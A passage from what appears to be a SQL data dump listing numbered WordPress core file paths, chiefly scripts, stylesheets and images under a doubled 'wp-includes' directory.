js/customize-models.min.js'),(3614,'wp-includes/wp-includes/js/customize-preview-nav-menus.js'),(3615,'wp-includes/wp-includes/js/customize-preview-nav-menus.min.js'),(3616,'wp-includes/wp-includes/js/customize-preview-widgets.js'),(3617,'wp-includes/wp-includes/js/customize-preview-widgets.min.js'),(3618,'wp-includes/wp-includes/js/customize-preview.js'),(3619,'wp-includes/wp-includes/js/customize-preview.min.js'),(3620,'wp-includes/wp-includes/js/customize-selective-refresh.js'),(3621,'wp-includes/wp-includes/js/customize-selective-refresh.min.js'),(3622,'wp-includes/wp-includes/js/customize-views.js'),(3623,'wp-includes/wp-includes/js/customize-views.min.js'),(3624,'wp-includes/wp-includes/js/dist/a11y.js'),(3625,'wp-includes/wp-includes/js/dist/a11y.min.js'),(3626,'wp-includes/wp-includes/js/dist/annotations.js'),(3627,'wp-includes/wp-includes/js/dist/annotations.min.js'),(3628,'wp-includes/wp-includes/js/dist/api-fetch.js'),(3629,'wp-includes/wp-includes/js/dist/api-fetch.min.js'),(3630,'wp-includes/wp-includes/js/dist/autop.js'),(3631,'wp-includes/wp-includes/js/dist/autop.min.js'),(3632,'wp-includes/wp-includes/js/dist/blob.js'),(3633,'wp-includes/wp-includes/js/dist/blob.min.js'),(3634,'wp-includes/wp-includes/js/dist/block-directory.js'),(3635,'wp-includes/wp-includes/js/dist/block-directory.min.js'),(3636,'wp-includes/wp-includes/js/dist/block-editor.js'),(3637,'wp-includes/wp-includes/js/dist/block-editor.min.js'),(3638,'wp-includes/wp-includes/js/dist/block-library.js'),(3639,'wp-includes/wp-includes/js/dist/block-library.min.js'),(3640,'wp-includes/wp-includes/js/dist/block-serialization-default-parser.js'),(3641,'wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js'),(3642,'wp-includes/wp-includes/js/dist/blocks.js'),(3643,'wp-includes/wp-includes/js/dist/blocks.min.js'),(3644,'wp-includes/wp-includes/js/dist/components.js'),(3645,'wp-includes/wp-includes/js/dist/components.min.js'),(3646,'wp-includes/wp-includes/js/dist/compose.js'),(3647,'wp-includes/wp-includes/js/dist/compose.min.js'),(3648,'wp-includes/wp-includes/js/dist/core-data.js'),(3649,'wp-includes/wp-includes/js/dist/core-data.min.js'),(3650,'wp-includes/wp-includes/js/dist/data-controls.js'),(3651,'wp-includes/wp-includes/js/dist/data-controls.min.js'),(3652,'wp-includes/wp-includes/js/dist/data.js'),(3653,'wp-includes/wp-includes/js/dist/data.min.js'),(3654,'wp-includes/wp-includes/js/dist/date.js'),(3655,'wp-includes/wp-includes/js/dist/date.min.js'),(3656,'wp-includes/wp-includes/js/dist/deprecated.js'),(3657,'wp-includes/wp-includes/js/dist/deprecated.min.js'),(3658,'wp-includes/wp-includes/js/dist/dom-ready.js'),(3659,'wp-includes/wp-includes/js/dist/dom-ready.min.js'),(3660,'wp-includes/wp-includes/js/dist/dom.js'),(3661,'wp-includes/wp-includes/js/dist/dom.min.js'),(3662,'wp-includes/wp-includes/js/dist/edit-post.js'),(3663,'wp-includes/wp-includes/js/dist/edit-post.min.js'),(3664,'wp-includes/wp-includes/js/dist/editor.js'),(3665,'wp-includes/wp-includes/js/dist/editor.min.js'),(3666,'wp-includes/wp-includes/js/dist/element.js'),(3667,'wp-includes/wp-includes/js/dist/element.min.js'),(3668,'wp-includes/wp-includes/js/dist/escape-html.js'),(3669,'wp-includes/wp-includes/js/dist/escape-html.min.js'),(3670,'wp-includes/wp-includes/js/dist/format-library.js'),(3671,'wp-includes/wp-includes/js/dist/format-library.min.js'),(3672,'wp-includes/wp-includes/js/dist/hooks.js'),(3673,'wp-includes/wp-includes/js/dist/hooks.min.js'),(3674,'wp-includes/wp-includes/js/dist/html-entities.js'),(3675,'wp-includes/wp-includes/js/dist/html-entities.min.js'),(3676,'wp-includes/wp-includes/js/dist/i18n.js'),(3677,'wp-includes/wp-includes/js/dist/i18n.min.js'),(3678,'wp-includes/wp-includes/js/dist/is-shallow-equal.js'),(3679,'wp-includes/wp-includes/js/dist/is-shallow-equal.min.js'),(3680,'wp-includes/wp-includes/js/dist/keyboard-shortcuts.js'),(3681,'wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js'),(3682,'wp-includes/wp-includes/js/dist/keycodes.js'),(3683,'wp-includes/wp-includes/js/dist/keycodes.min.js'),(3684,'wp-includes/wp-includes/js/dist/list-reusable-blocks.js'),(3685,'wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js'),(3686,'wp-includes/wp-includes/js/dist/media-utils.js'),(3687,'wp-includes/wp-includes/js/dist/media-utils.min.js'),(3688,'wp-includes/wp-includes/js/dist/notices.js'),(3689,'wp-includes/wp-includes/js/dist/notices.min.js'),(3690,'wp-includes/wp-includes/js/dist/nux.js'),(3691,'wp-includes/wp-includes/js/dist/nux.min.js'),(3692,'wp-includes/wp-includes/js/dist/plugins.js'),(3693,'wp-includes/wp-includes/js/dist/plugins.min.js'),(3694,'wp-includes/wp-includes/js/dist/primitives.js'),(3695,'wp-includes/wp-includes/js/dist/primitives.min.js'),(3696,'wp-includes/wp-includes/js/dist/priority-queue.js'),(3697,'wp-includes/wp-includes/js/dist/priority-queue.min.js'),(3698,'wp-includes/wp-includes/js/dist/redux-routine.js'),(3699,'wp-includes/wp-includes/js/dist/redux-routine.min.js'),(3700,'wp-includes/wp-includes/js/dist/reusable-blocks.js'),(3701,'wp-includes/wp-includes/js/dist/reusable-blocks.min.js'),(3702,'wp-includes/wp-includes/js/dist/rich-text.js'),(3703,'wp-includes/wp-includes/js/dist/rich-text.min.js'),(3704,'wp-includes/wp-includes/js/dist/server-side-render.js'),(3705,'wp-includes/wp-includes/js/dist/server-side-render.min.js'),(3706,'wp-includes/wp-includes/js/dist/shortcode.js'),(3707,'wp-includes/wp-includes/js/dist/shortcode.min.js'),(3708,'wp-includes/wp-includes/js/dist/token-list.js'),(3709,'wp-includes/wp-includes/js/dist/token-list.min.js'),(3710,'wp-includes/wp-includes/js/dist/url.js'),(3711,'wp-includes/wp-includes/js/dist/url.min.js'),(3712,'wp-includes/wp-includes/js/dist/vendor/lodash.js'),(3713,'wp-includes/wp-includes/js/dist/vendor/lodash.min.js'),(3714,'wp-includes/wp-includes/js/dist/vendor/moment.js'),(3715,'wp-includes/wp-includes/js/dist/vendor/moment.min.js'),(3716,'wp-includes/wp-includes/js/dist/vendor/react-dom.js'),(3717,'wp-includes/wp-includes/js/dist/vendor/react-dom.min.js'),(3718,'wp-includes/wp-includes/js/dist/vendor/react.js'),(3719,'wp-includes/wp-includes/js/dist/vendor/react.min.js'),(3720,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js'),(3721,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js'),(3722,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js'),(3723,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js'),(3724,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js'),(3725,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js'),(3726,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js'),(3727,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js'),(3728,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js'),(3729,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js'),(3730,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js'),(3731,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js'),(3732,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js'),(3733,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js'),(3734,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js'),(3735,'wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js'),(3736,'wp-includes/wp-includes/js/dist/viewport.js'),(3737,'wp-includes/wp-includes/js/dist/viewport.min.js'),(3738,'wp-includes/wp-includes/js/dist/warning.js'),(3739,'wp-includes/wp-includes/js/dist/warning.min.js'),(3740,'wp-includes/wp-includes/js/dist/wordcount.js'),(3741,'wp-includes/wp-includes/js/dist/wordcount.min.js'),(3742,'wp-includes/wp-includes/js/heartbeat.js'),(3743,'wp-includes/wp-includes/js/heartbeat.min.js'),(3744,'wp-includes/wp-includes/js/hoverIntent.js'),(3745,'wp-includes/wp-includes/js/hoverIntent.min.js'),(3746,'wp-includes/wp-includes/js/hoverintent-js.min.js'),(3747,'wp-includes/wp-includes/js/imagesloaded.min.js'),(3748,'wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif'),(3749,'wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif'),(3750,'wp-includes/wp-includes/js/imgareaselect/imgareaselect.css'),(3751,'wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js'),(3752,'wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js'),(3753,'wp-includes/wp-includes/js/jcrop/Jcrop.gif'),(3754,'wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css'),(3755,'wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js'),(3756,'wp-includes/wp-includes/js/jquery/jquery-migrate.js'),(3757,'wp-includes/wp-includes/js/jquery/jquery-migrate.min.js'),(3758,'wp-includes/wp-includes/js/jquery/jquery.color.min.js'),(3759,'wp-includes/wp-includes/js/jquery/jquery.form.js'),(3760,'wp-includes/wp-includes/js/jquery/jquery.form.min.js'),(3761,'wp-includes/wp-includes/js/jquery/jquery.hotkeys.js'),(3762,'wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js'),(3763,'wp-includes/wp-includes/js/jquery/jquery.js'),(3764,'wp-includes/wp-includes/js/jquery/jquery.masonry.min.js'),(3765,'wp-includes/wp-includes/js/jquery/jquery.min.js'),(3766,'wp-includes/wp-includes/js/jquery/jquery.query.js'),(3767,'wp-includes/wp-includes/js/jquery/jquery.schedule.js'),(3768,'wp-includes/wp-includes/js/jquery/jquery.serialize-object.js'),(3769,'wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js'),(3770,'wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js'),(3771,'wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js'),(3772,'wp-includes/wp-includes/js/jquery/suggest.js'),(3773,'wp-includes/wp-includes/js/jquery/suggest.min.js'),(3774,'wp-includes/wp-includes/js/jquery/ui/accordion.js'),(3775,'wp-includes/wp-includes/js/jquery/ui/accordion.min.js'),(3776,'wp-includes/wp-includes/js/jquery/ui/autocomplete.js'),(3777,'wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js'),(3778,'wp-includes/wp-includes/js/jquery/ui/button.js'),(3779,'wp-includes/wp-includes/js/jquery/ui/button.min.js'),(3780,'wp-includes/wp-includes/js/jquery/ui/checkboxradio.js'),(3781,'wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js'),(3782,'wp-includes/wp-includes/js/jquery/ui/controlgroup.js'),(3783,'wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js'),(3784,'wp-includes/wp-includes/js/jquery/ui/core.js'),(3785,'wp-includes/wp-includes/js/jquery/ui/core.min.js'),(3786,'wp-includes/wp-includes/js/jquery/ui/datepicker.js'),(3787,'wp-includes/wp-includes/js/jquery/ui/datepicker.min.js'),(3788,'wp-includes/wp-includes/js/jquery/ui/dialog.js'),(3789,'wp-includes/wp-includes/js/jquery/ui/dialog.min.js'),(3790,'wp-includes/wp-includes/js/jquery/ui/draggable.js'),(3791,'wp-includes/wp-includes/js/jquery/ui/draggable.min.js'),(3792,'wp-includes/wp-includes/js/jquery/ui/droppable.js'),(3793,'wp-includes/wp-includes/js/jquery/ui/droppable.min.js'),(3794,'wp-includes/wp-includes/js/jquery/ui/effect-blind.js'),(3795,'wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js'),(3796,'wp-includes/wp-includes/js/jquery/ui/effect-bounce.js'),(3797,'wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js'),(3798,'wp-includes/wp-includes/js/jquery/ui/effect-clip.js'),(3799,'wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js'),(3800,'wp-includes/wp-includes/js/jquery/ui/effect-drop.js'),(3801,'wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js'),(3802,'wp-includes/wp-includes/js/jquery/ui/effect-explode.js'),(3803,'wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js'),(3804,'wp-includes/wp-includes/js/jquery/ui/effect-fade.js'),(3805,'wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js'),(3806,'wp-includes/wp-includes/js/jquery/ui/effect-fold.js'),(3807,'wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js'),(3808,'wp-includes/wp-includes/js/jquery/ui/effect-highlight.js'),(3809,'wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js'),(3810,'wp-includes/wp-includes/js/jquery/ui/effect-puff.js'),(3811,'wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js'),(3812,'wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js'),(3813,'wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js'),(3814,'wp-includes/wp-includes/js/jquery/ui/effect-scale.js'),(3815,'wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js'),(3816,'wp-includes/wp-includes/js/jquery/ui/effect-shake.js'),(3817,'wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js'),(3818,'wp-includes/wp-includes/js/jquery/ui/effect-size.js'),(3819,'wp-includes/wp-includes/js/jquery/ui/effect-size.min.js'),(3820,'wp-includes/wp-includes/js/jquery/ui/effect-slide.js'),(3821,'wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js'),(3822,'wp-includes/wp-includes/js/jquery/ui/effect-transfer.js'),(3823,'wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js'),(3824,'wp-includes/wp-includes/js/jquery/ui/effect.js'),(3825,'wp-includes/wp-includes/js/jquery/ui/effect.min.js'),(3826,'wp-includes/wp-includes/js/jquery/ui/menu.js'),(3827,'wp-includes/wp-includes/js/jquery/ui/menu.min.js'),(3828,'wp-includes/wp-includes/js/jquery/ui/mouse.js'),(3829,'wp-includes/wp-includes/js/jquery/ui/mouse.min.js'),(3830,'wp-includes/wp-includes/js/jquery/ui/progressbar.js'),(3831,'wp-includes/wp-includes/js/jquery/ui/progressbar.min.js'),(3832,'wp-includes/wp-includes/js/jquery/ui/resizable.js'),(3833,'wp-includes/wp-includes/js/jquery/ui/resizable.min.js'),(3834,'wp-includes/wp-includes/js/jquery/ui/selectable.js'),(3835,'wp-includes/wp-includes/js/jquery/ui/selectable.min.js'),(3836,'wp-includes/wp-includes/js/jquery/ui/selectmenu.js'),(3837,'wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js'),(3838,'wp-includes/wp-includes/js/jquery/ui/slider.js'),(3839,'wp-includes/wp-includes/js/jquery/ui/slider.min.js'),(3840,'wp-includes/wp-includes/js/jquery/ui/sortable.js'),(3841,'wp-includes/wp-includes/js/jquery/ui/sortable.min.js'),(3842,'wp-includes/wp-includes/js/jquery/ui/spinner.js'),(3843,'wp-includes/wp-includes/js/jquery/ui/spinner.min.js'),(3844,'wp-includes/wp-includes/js/jquery/ui/tabs.js'),(3845,'wp-includes/wp-includes/js/jquery/ui/tabs.min.js'),(3846,'wp-includes/wp-includes/js/jquery/ui/tooltip.js'),(3847,'wp-includes/wp-includes/js/jquery/ui/tooltip.min.js'),(3848,'wp-includes/wp-includes/js/json2.js'),(3849,'wp-includes/wp-includes/js/json2.min.js'),(3850,'wp-includes/wp-includes/js/masonry.min.js'),(3851,'wp-includes/wp-includes/js/mce-view.js'),(3852,'wp-includes/wp-includes/js/mce-view.min.js'),(3853,'wp-includes/wp-includes/js/media-audiovideo.js'),(3854,'wp-includes/wp-includes/js/media-audiovideo.min.js'),(3855,'wp-includes/wp-includes/js/media-editor.js'),(3856,'wp-includes/wp-includes/js/media-editor.min.js'),(3857,'wp-includes/wp-includes/js/media-grid.js'),(3858,'wp-includes/wp-includes/js/media-grid.min.js'),(3859,'wp-includes/wp-includes/js/media-models.js'),(3860,'wp-includes/wp-includes/js/media-models.min.js'),(3861,'wp-includes/wp-includes/js/media-views.js'),(3862,'wp-includes/wp-includes/js/media-views.min.js'),(3863,'wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js'),(3864,'wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js'),(3865,'wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js'),(3866,'wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js'),(3867,'wp-includes/wp-includes/js/mediaelement/mediaelement.js'),(3868,'wp-includes/wp-includes/js/mediaelement/mediaelement.min.js'),(3869,'wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),(3870,'wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),(3871,'wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css'),(3872,'wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css'),(3873,'wp-includes/wp-includes/js/mediaelement/mejs-controls.png'),(3874,'wp-includes/wp-includes/js/mediaelement/mejs-controls.svg'),(3875,'wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js'),(3876,'wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js'),(3877,'wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css'),(3878,'wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js'),(3879,'wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css'),(3880,'wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js'),(3881,'wp-includes/wp-includes/js/mediaelement/wp-playlist.js'),(3882,'wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js'),(3883,'wp-includes/wp-includes/js/plupload/handlers.js'),(3884,'wp-includes/wp-includes/js/plupload/handlers.min.js'),(3885,'wp-includes/wp-includes/js/plupload/license.txt'),(3886,'wp-includes/wp-includes/js/plupload/moxie.js'),(3887,'wp-includes/wp-includes/js/plupload/moxie.min.js'),(3888,'wp-includes/wp-includes/js/plupload/plupload.js'),(3889,'wp-includes/wp-includes/js/plupload/plupload.min.js'),(3890,'wp-includes/wp-includes/js/plupload/wp-plupload.js'),(3891,'wp-includes/wp-includes/js/plupload/wp-plupload.min.js'),(3892,'wp-includes/wp-includes/js/quicktags.js'),(3893,'wp-includes/wp-includes/js/quicktags.min.js'),(3894,'wp-includes/wp-includes/js/shortcode.js'),(3895,'wp-includes/wp-includes/js/shortcode.min.js'),(3896,'wp-includes/wp-includes/js/swfobject.js'),(3897,'wp-includes/wp-includes/js/swfupload/handlers.js'),(3898,'wp-includes/wp-includes/js/swfupload/handlers.min.js'),(3899,'wp-includes/wp-includes/js/swfupload/license.txt'),(3900,'wp-includes/wp-includes/js/swfupload/swfupload.js'),(3901,'wp-includes/wp-includes/js/thickbox/loadingAnimation.gif'),(3902,'wp-includes/wp-includes/js/thickbox/macFFBgHack.png'),(3903,'wp-includes/wp-includes/js/thickbox/thickbox.css'),(3904,'wp-includes/wp-includes/js/thickbox/thickbox.js'),(3905,'wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js'),(3906,'wp-includes/wp-includes/js/tinymce/license.txt'),(3907,'wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js'),(3908,'wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(3909,'wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(3910,'wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(3911,'wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(3912,'wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(3913,'wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(3914,'wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js'),(3915,'wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(3916,'wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(3917,'wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(3918,'wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js'),(3919,'wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(3920,'wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js'),(3921,'wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js'),(3922,'wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js'),(3923,'wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js'),(3924,'wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js'),(3925,'wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(3926,'wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js'),(3927,'wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js'),(3928,'wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js'),(3929,'wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(3930,'wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(3931,'wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(3932,'wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(3933,'wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(3934,'wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(3935,'wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(3936,'wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(3937,'wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(3938,'wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(3939,'wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(3940,'wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(3941,'wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(3942,'wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(3943,'wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(3944,'wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(3945,'wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(3946,'wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js'),(3947,'wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(3948,'wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(3949,'wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(3950,'wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js'),(3951,'wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(3952,'wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(3953,'wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css'),(3954,'wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(3955,'wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(3956,'wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(3957,'wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(3958,'wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(3959,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(3960,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(3961,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(3962,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(3963,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(3964,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(3965,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(3966,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png'),(3967,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(3968,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(3969,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(3970,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(3971,'wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png'),(3972,'wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(3973,'wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js'),(3974,'wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js'),(3975,'wp-includes/wp-includes/js/tinymce/themes/modern/theme.js'),(3976,'wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js'),(3977,'wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js'),(3978,'wp-includes/wp-includes/js/tinymce/tinymce.min.js'),(3979,'wp-includes/wp-includes/js/tinymce/utils/editable_selects.js'),(3980,'wp-includes/wp-includes/js/tinymce/utils/form_utils.js'),(3981,'wp-includes/wp-includes/js/tinymce/utils/mctabs.js'),(3982,'wp-includes/wp-includes/js/tinymce/utils/validate.js'),(3983,'wp-includes/wp-includes/js/tinymce/wp-tinymce.js'),(3984,'wp-includes/wp-includes/js/tinymce/wp-tinymce.php'),(3985,'wp-includes/wp-includes/js/tw-sack.js'),(3986,'wp-includes/wp-includes/js/tw-sack.min.js'),(3987,'wp-includes/wp-includes/js/twemoji.js'),(3988,'wp-includes/wp-includes/js/twemoji.min.js'),(3989,'wp-includes/wp-includes/js/underscore.js'),(3990,'wp-includes/wp-includes/js/underscore.min.js'),(3991,'wp-includes/wp-includes/js/utils.js'),(3992,'wp-includes/wp-includes/js/utils.min.js'),(3993,'wp-includes/wp-includes/js/wp-ajax-response.js'),(3994,'wp-includes/wp-includes/js/wp-ajax-response.min.js'),(3995,'wp-includes/wp-includes/js/wp-api.js'),(3996,'wp-includes/wp-includes/js/wp-api.min.js'),(3997,'wp-includes/wp-includes/js/wp-auth-check.js'),(3998,'wp-includes/wp-includes/js/wp-auth-check.min.js'),(3999,'wp-includes/wp-includes/js/wp-backbone.js'),(4000,'wp-includes/wp-includes/js/wp-backbone.min.js'),(4001,'wp-includes/wp-includes/js/wp-custom-header.js'),(4002,'wp-includes/wp-includes/js/wp-custom-header.min.js'),(4003,'wp-includes/wp-includes/js/wp-embed-template.js'),(4004,'wp-includes/wp-includes/js/wp-embed-template.min.js'),(4005,'wp-includes/wp-includes/js/wp-embed.js'),(4006,'wp-includes/wp-includes/js/wp-embed.min.js'),(4007,'wp-includes/wp-includes/js/wp-emoji-loader.js'),(4008,'wp-includes/wp-includes/js/wp-emoji-loader.min.js'),(4009,'wp-includes/wp-includes/js/wp-emoji-release.min.js'),(4010,'wp-includes/wp-includes/js/wp-emoji.js'),(4011,'wp-includes/wp-includes/js/wp-emoji.min.js'),(4012,'wp-includes/wp-includes/js/wp-list-revisions.js'),(4013,'wp-includes/wp-includes/js/wp-list-revisions.min.js'),(4014,'wp-includes/wp-includes/js/wp-lists.js'),(4015,'wp-includes/wp-includes/js/wp-lists.min.js'),(4016,'wp-includes/wp-includes/js/wp-pointer.js'),(4017,'wp-includes/wp-includes/js/wp-pointer.min.js'),(4018,'wp-includes/wp-includes/js/wp-sanitize.js'),(4019,'wp-includes/wp-includes/js/wp-sanitize.min.js'),(4020,'wp-includes/wp-includes/js/wp-util.js'),(4021,'wp-includes/wp-includes/js/wp-util.min.js'),(4022,'wp-includes/wp-includes/js/wpdialog.js'),(4023,'wp-includes/wp-includes/js/wpdialog.min.js'),(4024,'wp-includes/wp-includes/js/wplink.js'),(4025,'wp-includes/wp-includes/js/wplink.min.js'),(4026,'wp-includes/wp-includes/js/zxcvbn-async.js'),(4027,'wp-includes/wp-includes/js/zxcvbn-async.min.js'),(4028,'wp-includes/wp-includes/js/zxcvbn.min.js'),(4029,'wp-includes/wp-includes/kses.php'),(4030,'wp-includes/wp-includes/l10n.php'),(4031,'wp-includes/wp-includes/link-template.php'),(4032,'wp-includes/wp-includes/load.php'),(4033,'wp-includes/wp-includes/locale.php'),(4034,'wp-includes/wp-includes/media-template.php'),(4035,'wp-includes/wp-includes/media.php'),(4036,'wp-includes/wp-includes/meta.php'),(4037,'wp-includes/wp-includes/ms-blogs.php'),(4038,'wp-includes/wp-includes/ms-default-constants.php'),(4039,'wp-includes/wp-includes/ms-default-filters.php'),(4040,'wp-includes/wp-includes/ms-deprecated.php'),(4041,'wp-includes/wp-includes/ms-files.php'),(4042,'wp-includes/wp-includes/ms-functions.php'),(4043,'wp-includes/wp-includes/ms-load.php'),(4044,'wp-includes/wp-includes/ms-network.php'),(4045,'wp-includes/wp-includes/ms-settings.php'),(4046,'wp-includes/wp-includes/ms-site.php'),(4047,'wp-includes/wp-includes/nav-menu-template.php'),(4048,'wp-includes/wp-includes/nav-menu.php'),(4049,'wp-includes/wp-includes/option.php'),(4050,'wp-includes/wp-includes/pluggable-deprecated.php'),(4051,'wp-includes/wp-includes/pluggable.php'),(4052,'wp-includes/wp-includes/plugin.php'),(4053,'wp-includes/wp-includes/post-formats.php'),(4054,'wp-includes/wp-includes/post-template.php'),(4055,'wp-includes/wp-includes/post-thumbnail-template.php'),(4056,'wp-includes/wp-includes/post.php'),(4057,'wp-includes/wp-includes/query.php'),(4058,'wp-includes/wp-includes/random_compat/byte_safe_strings.php'),(4059,'wp-includes